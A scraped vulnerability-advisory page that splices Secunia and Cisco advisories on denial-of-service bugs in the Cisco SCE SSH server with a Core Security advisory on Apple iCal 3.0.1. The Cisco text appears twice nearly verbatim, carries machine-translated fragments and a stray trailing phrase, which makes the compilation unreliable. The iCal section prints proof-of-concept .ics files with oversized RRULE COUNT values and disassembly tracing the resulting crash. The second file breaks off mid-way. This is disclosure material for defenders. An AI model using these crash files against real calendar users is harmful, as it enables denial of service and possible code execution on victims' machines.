http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in the SSH server in (1) Cisco Service Control Engine (SCE) before 3.1.6, and (2) Icon Labs Iconfidant SSH before 2.3.8, allows remote attackers to cause a denial of service (device instability) via "SSH credentials that attempt to change the authentication method," aka Bug ID CSCsm14239. The most severe of these issues may allow an attacker to cause a vulnerable system to crash. Icon Labs Provided by Iconfidant SSH There are multiple vulnerabilities in the server. Icon Labs Provided by Iconfidant SSH Is an authentication protocol provided for embedded systems (SSH) is. Iconfidant SSH There are multiple vulnerabilities in the server.Service disruption from a remote third party (DoS) Under attack or server SSH May not be accepted. Cisco SCE (Service Control Engine) devices are prone to multiple denial-of-service vulnerabilities. Attackers can leverage these issues to disrupt system stability or cause devices to reload. Successful exploits will deny service to legitimate users. SCE devices running versions prior to SCOS (Service Control Operating System) 3.1.6 may be affected. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. SOLUTION: Update to version 3.1.6. http://www.cisco.com/pcgi-bin/tablebuild.pl/scos PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. The first vulnerability may be triggered during SSH login activity that is conducted within aggressive time frames. The second vulnerability may be triggered with normal SSH login activity in combination with other SCE management actions occurring simultaneously. The third vulnerability may be triggered during SSH login and is specific to the usage of unique invalid authentication credentials. Cisco has made free upgrade software available to address these vulnerabilities for affected customers. There are no workarounds for these vulnerabilities. Note: These vulnerabilities are independent of each other; a device may be affected by one vulnerability and not by the others. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml. Note: The SCE SSH server is disabled by default. The following example shows a Cisco SCE that runs software release 3.1.6: SCE2000#>show version System version: Version 3.1.6 Build 157 Build time: Mar 31 2008, 18:58:49 (Change-list 303626) Software version is: Version 3.1.6 Build 157 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco SCE 1000 and 2000 series devices provide high-capacity advanced application-level bandwidth optimization, stateful application inspection, session-based classification and control of network traffic. The SCE solution allows for the detection and control of network applications including: web browsing, multimedia streaming, and peer-to-peer (P2P). This Security Advisory describes multiple distinct vulnerabilities. These vulnerabilities are independent of each other. * System vulnerability to SSH login activity A vulnerability impacting the SCE SSH server may be triggered during SSH login activity, resulting in system instability or a reload of the SCE. Specific SSH processes may encounter temporary resource unavailability if called within aggressive intervals. This vulnerability is documented in Cisco Bug ID CSCsi68582 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-0534. * SSH login activity leads to illegal Input/Output operations A second vulnerability exists in the SCE SSH server that may be triggered with normal SSH traffic to the SCE management interface occurring in conjunction with other management tasks. During this event, an illegal IO operation may impact the SCE management agent, requiring a reboot of the SCE to recover management access. This vulnerability is documented in Cisco Bug ID CSCsh49563 and has been assigned CVE ID CVE-2008-0536. * SCE SSH authentication sequence anomaly A third vulnerability exists in the SCE SSH server that may also be triggered during the SSH login process but unrelated to login attempt frequency or other concurrent management tasks. This issue is triggered by the usage of specific SSH credentials that attempt to change the authentication method, resulting in an authentication sequence anomaly impacting system stability. This vulnerability is documented in Cisco Bug ID CSCsm14239 and has been assigned CVE ID CVE-2008-0535. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding VSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html. Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss. * System vulnerability to SSH login activity (CSCsi68582) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * SSH login activity leads to illegal I/O operations (CSCsh49563) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * SCE SSH authentication sequence anomaly (CSCsm14239) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities may result in the loss of management access or, in some cases, cause vulnerable SCE devices to reload. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. The following list contains the first fixed software release for each vulnerability: +---------------------------------------+ | | Affected | First | | Vulnerability | Major | Fixed | | | Release | Release | |------------------+----------+---------| | System | 1.x | 3.1.6 | |vulnerability to |----------+---------| | SSH login | 2.x | 3.1.6 | |activity |----------+---------| | | 3.x | 3.1.6 | |------------------+----------+---------| | | 1.x | 3.0.7 | |SSH login |----------+---------| | activity leads | 2.x | 3.0.7 | |to illegal IO |----------+---------| | operations | 3.x | 3.0.7, | | | | 3.1.0 | |------------------+----------+---------| | | 1.x | 3.1.6 | |SCE SSH |----------+---------| | authentication | 2.x | 3.1.6 | |sequence anomaly |----------+---------| | | 3.x | 3.1.6 | +---------------------------------------+ SCOS software version 3.1.6 contains the fixes for all vulnerabilities described in this document. SCOS software is available for download from the following location on cisco.com: http://www.cisco.com/pcgi-bin/tablebuild.pl/scos?psrtdcat20e2 Workarounds =========== There are no workarounds for these vulnerabilities. Restricting SCE SSH management interface access to only trusted devices through the use of SCE ACLs or Transit ACLs is strongly recommended. Additional information about SCE ACLs is available in the "Configuring the Management Interface and Security" section of the SCE Software Configuration Guide: http://www.cisco.com/en/US/products/ps6134/products_configuration_guide_chapter09186a00808498b9.html#wp1060396 Additional information about tACLs is available in Transit Access Control Lists: Filtering at Your Edge: http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. The SSH login activity vulnerability was discovered during the resolution of customer support cases. The illegal Input/Output operation and authentication sequence anomaly were discovered by Cisco during internal testing. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +------------------------------------------------------------+ | Revision 1.0 | 2008-May-21 | Initial public release. | +------------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2007-2008 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- Updated: May 21, 2008 Document ID: 100706 +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFINE1U86n/Gc8U/uARAt0+AJ409BqcGWyfNNy1ZxGKj5m0IElUKwCdFCqC iNU22mLg2pFDqnDyLstihPI= =oKHO -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . flooding the vulnerable system with a large amount of packets

Unspecified vulnerability in the SSH server in (1) Cisco Service Control Engine (SCE) 3.0.x before 3.0.7 and 3.1.x before 3.1.0, and (2) Icon Labs Iconfidant SSH before 2.3.8, allows remote attackers to cause a denial of service (management interface outage) via SSH traffic that occurs during management operations and triggers "illegal I/O operations," aka Bug ID CSCsh49563. The Icon Labs Iconfidant SSH server contails multiple vulnerabilities. The most severe of these issues may allow an attacker to cause a vulnerable system to crash. The problem is Bug IDs CSCsh49563 It is a problem.Management operations and fraud by third parties I/O Caused by operation SSH Service disruption through traffic (DoS) There is a possibility of being put into a state. Attackers can leverage these issues to disrupt system stability or cause devices to reload. Successful exploits will deny service to legitimate users. SCE devices running versions prior to SCOS (Service Control Operating System) 3.1.6 may be affected. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. Successful exploitation of these vulnerabilities requires that the SSH server is enabled (not enabled by default). SOLUTION: Update to version 3.1.6. http://www.cisco.com/pcgi-bin/tablebuild.pl/scos PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. The first vulnerability may be triggered during SSH login activity that is conducted within aggressive time frames. The second vulnerability may be triggered with normal SSH login activity in combination with other SCE management actions occurring simultaneously. The third vulnerability may be triggered during SSH login and is specific to the usage of unique invalid authentication credentials. Cisco has made free upgrade software available to address these vulnerabilities for affected customers. There are no workarounds for these vulnerabilities. Note: These vulnerabilities are independent of each other; a device may be affected by one vulnerability and not by the others. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml. Note: The SCE SSH server is disabled by default. The following example shows a Cisco SCE that runs software release 3.1.6: SCE2000#>show version System version: Version 3.1.6 Build 157 Build time: Mar 31 2008, 18:58:49 (Change-list 303626) Software version is: Version 3.1.6 Build 157 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco SCE 1000 and 2000 series devices provide high-capacity advanced application-level bandwidth optimization, stateful application inspection, session-based classification and control of network traffic. The SCE solution allows for the detection and control of network applications including: web browsing, multimedia streaming, and peer-to-peer (P2P). This Security Advisory describes multiple distinct vulnerabilities. These vulnerabilities are independent of each other. Specific SSH processes may encounter temporary resource unavailability if called within aggressive intervals. This vulnerability is documented in Cisco Bug ID CSCsi68582 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-0534. During this event, an illegal IO operation may impact the SCE management agent, requiring a reboot of the SCE to recover management access. This vulnerability is documented in Cisco Bug ID CSCsh49563 and has been assigned CVE ID CVE-2008-0536. * SCE SSH authentication sequence anomaly A third vulnerability exists in the SCE SSH server that may also be triggered during the SSH login process but unrelated to login attempt frequency or other concurrent management tasks. This issue is triggered by the usage of specific SSH credentials that attempt to change the authentication method, resulting in an authentication sequence anomaly impacting system stability. This vulnerability is documented in Cisco Bug ID CSCsm14239 and has been assigned CVE ID CVE-2008-0535. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding VSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html. Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss. * System vulnerability to SSH login activity (CSCsi68582) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * SSH login activity leads to illegal I/O operations (CSCsh49563) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * SCE SSH authentication sequence anomaly (CSCsm14239) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities may result in the loss of management access or, in some cases, cause vulnerable SCE devices to reload. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. The following list contains the first fixed software release for each vulnerability: +---------------------------------------+ | | Affected | First | | Vulnerability | Major | Fixed | | | Release | Release | |------------------+----------+---------| | System | 1.x | 3.1.6 | |vulnerability to |----------+---------| | SSH login | 2.x | 3.1.6 | |activity |----------+---------| | | 3.x | 3.1.6 | |------------------+----------+---------| | | 1.x | 3.0.7 | |SSH login |----------+---------| | activity leads | 2.x | 3.0.7 | |to illegal IO |----------+---------| | operations | 3.x | 3.0.7, | | | | 3.1.0 | |------------------+----------+---------| | | 1.x | 3.1.6 | |SCE SSH |----------+---------| | authentication | 2.x | 3.1.6 | |sequence anomaly |----------+---------| | | 3.x | 3.1.6 | +---------------------------------------+ SCOS software version 3.1.6 contains the fixes for all vulnerabilities described in this document. SCOS software is available for download from the following location on cisco.com: http://www.cisco.com/pcgi-bin/tablebuild.pl/scos?psrtdcat20e2 Workarounds =========== There are no workarounds for these vulnerabilities. Restricting SCE SSH management interface access to only trusted devices through the use of SCE ACLs or Transit ACLs is strongly recommended. Additional information about SCE ACLs is available in the "Configuring the Management Interface and Security" section of the SCE Software Configuration Guide: http://www.cisco.com/en/US/products/ps6134/products_configuration_guide_chapter09186a00808498b9.html#wp1060396 Additional information about tACLs is available in Transit Access Control Lists: Filtering at Your Edge: http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. The SSH login activity vulnerability was discovered during the resolution of customer support cases. The illegal Input/Output operation and authentication sequence anomaly were discovered by Cisco during internal testing. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +------------------------------------------------------------+ | Revision 1.0 | 2008-May-21 | Initial public release. | +------------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2007-2008 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- Updated: May 21, 2008 Document ID: 100706 +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFINE1U86n/Gc8U/uARAt0+AJ409BqcGWyfNNy1ZxGKj5m0IElUKwCdFCqC iNU22mLg2pFDqnDyLstihPI= =oKHO -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . flooding the vulnerable system with a large amount of packets

Apple iCal 3.0.1 on Mac OS X allows remote CalDAV servers, and user-assisted remote attackers, to cause a denial of service (NULL pointer dereference and application crash) or possibly execute arbitrary code via a .ics file containing (1) a large 16-bit integer on a TRIGGER line, or (2) a large integer in a COUNT field on an RRULE line. (1) TRIGGER Excessively large of lines 16 Bit integer (2) RRULE In line COUNT Overly large integer in field. Apple iCal is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. This issue affects iCal 3.0.1 running on Mac OS X 10.5.1; previous versions may also be affected. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Multiple vulnerabilities in iCal *Advisory Information* Title: Multiple vulnerabilities in iCal Advisory ID: CORE-2008-0126 Advisory URL: http://www.coresecurity.com/?action=item&id=2219 Date published: 2008-05-21 Date of last update: 2008-05-21 Vendors contacted: Apple Inc. Release mode: Coordinated release *Vulnerability Information* Class: Input Validation Remotely Exploitable: Yes (client-side) Locally Exploitable: No Bugtraq ID: 28629 28632 28633 CVE Name: CVE-2008-1035 CVE-2008-2006 CVE-2008-2007 *Vulnerability Description* iCal is a personal calendar application from Apple Inc. included on the Mac OS X operating system. The calendar application can be used as a stand-alone application or as a client-side component to calendar server that lets users create and share multiple calendars and subscribe to other user's calendars. Apple's iCal uses the iCalendar standard for its calendar file format (which uses the '.ics' filename extension) [1] and the CalDAV protocol for calendar sharing [2]. There is a growing number of web sites providing calendars files and open subscription to calendar updates [3][4][5]. The most serious of the three vulnerabilities is due to potential memory corruption resulting from a resource liberation bug that can be triggered with a malformed '.ics' calendar file specially crafted by a would-be attacker. Exploitation of these vulnerabilities in a client-side attack scenario is possible with user assistance by opening or clicking on specially crafted '.ics' file send over email or hosted on a malicious web server; or without direct user assistance if a would-be attacker has the ability to legitimately add or modify calendar files on a CalDAV server. *Vulnerable Packages* . iCal version 3.0.1 on MacOS X 10.5.1 (Leopard). *Non-vulnerable Packages* . Available through Apple security updates (see vendor information below). *Vendor Information, Solutions and Workarounds* The following information was provided by the vendor: Availability Apple security updates are available via the Software Update mechanism: http://support.apple.com/kb/HT1338 Apple security updates are also available for manual download via: http://www.apple.com/support/downloads/ Cross-References If you provide cross-referencing information in your advisory please link to the following URL: http://support.apple.com/kb/HT1222 *Credits* These vulnerabilities were discovered and researched by Rodrigo Carvalho, from the Core Security Consulting Services (SCS) team of Core Security Technologies during Bugweek 2007. Additional research was done by Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT). A client-side attack directed to the end-users of the iCal application can be executed by sending an email with a malicious .ics file attachment, by hosting a malicious .ics file on web site and directing users to open it or by injecting a malicous .ics file on a CalDAV enabled server to which potential victims are subscribed to update their calendars automatically. In the three reported cases the vulnerabilities arise from improper validation of input while or after parsing of the calendar file format. The following Proof of Concept (PoC) file is provided to demonstrate its feasibility, to trigger the bug import a .ics file with the following content and then select one of the created events. /----------- BEGIN:VCALENDAR X-WR-TIMEZONE:America/Buenos_Aires PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN X-WR-CALNAME: Vulnerable VERSION:2.0 X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:4 DTSTART;TZID=America/Buenos_Aires:20071225T110000 DURATION:PT1H UID:48878014-5F03-43E5-8639-61E708714F9A DTSTAMP:20071213T130632Z SUMMARY:Vuln CREATED:20071213T130611Z RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 END:VEVENT END:VCALENDAR - -----------/ Analysis of the vulnerability The above proof-of-concept file creates new events in the iCal application . When a user double-clicks on these events the program crashes writing in the memory pointed by pointer 'EDI=0'. Only the value of 'EAX' is under control, must be less than '0x7fffffff' and is extracted from the following line of the PoC '.ics' file. /----------- RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 (0x7FFFFFFE) - -----------/ /----------- __text:0013C178 push ebp __text:0013C179 mov ebp, esp __text:0013C17B sub esp, 38h __text:0013C17E mov eax, ds:off_1F435C __text:0013C183 mov [ebp+var_4], edi __text:0013C186 mov edi, [ebp+arg_C] __text:0013C189 mov [ebp+var_8], esi __text:0013C18C mov esi, [ebp+arg_8] __text:0013C18F mov [ebp+var_C], ebx __text:0013C192 mov [esp+38h+var_34], eax __text:0013C196 mov eax, [ebp+arg_0] __text:0013C199 mov [esp+38h+var_28], 0 __text:0013C1A1 mov [esp+38h+var_2C], 0 - -----------/ Here is written on '[ebp + var28]' and '[ebp + var2C]' and because 'EBP' is 'ESP' minus '0x38', this is similar to /----------- [ebp + var28] = [esp+0x38+var_28] [ebp + var2C] = [esp+0x38+var_2C] - -----------/ There are located the null-pointers on the stack. /----------- BFFFEF7C var_2C dd 0 BFFFEF80 var_28 dd 0 - -----------/ Upon reaching the function where the crash occurs. /----------- __text:0014ADC3 push ebp __text:0014ADC4 mov ebp, esp __text:0014ADC6 sub esp, 48h __text:0014ADC9 mov eax, ds:stru_1FA2A0.superclass - -----------/ Logically the zeros are still present because don't work with those values until we enter. /----------- BFFFEF7C arg_C dd 0 BFFFEF80 arg_10 dd 0 - -----------/ We see that the function argument 'arg_C' is loaded and moved to 'EDI'. /----------- 0014ADE0 mov edi, [ebp+arg_C] - -----------/ And this is the location where is written at the moment of crashing further ahead, meaning that it is a zero that can't be changed. /----------- 0014AE2F mov dword ptr [edi], 0 - -----------/ When getting closer to the point of crash because we control 'EAX' and we can trigger a jump after comparing with '[ebx+0Ch]' and '[ebx+08h]'. /----------- 0014AE20 cmp eax, [ebx+0Ch] (if it is lower than 1) 0014AE23 jl short loc_14AE2F 0014AE25 cmp eax, [ebx+8] (if it is lower than 0x270F) 0014AE2D jle short loc_14AE37 169280B8 dd 270Fh (ebx+08) 169280BC dd 1 (ebx+0C) - -----------/ The first comparison for 'JL' doesn't avoid the crash zone, but anyway negative numbers can't be inserted by default and a zero value does not crash the program or even gets it near the critical zone. Any other value crashes the application when writing in the null location. In the other case a comparison is made such that if 'EAX' is less than '0x270f' the crash zone is avoided and the program continues to work without problem. Negative values are not read and if a value greater than '0x7fffffff' the maximum value is used instead. The corresponding PoC follows. to trigger the bug import a .ics file with the following content then click on the 65535 on edit mode and accept it without changes. /----------- BEGIN:VCALENDAR X-WR-CALNAME:Fake event PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN VERSION:2.0 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 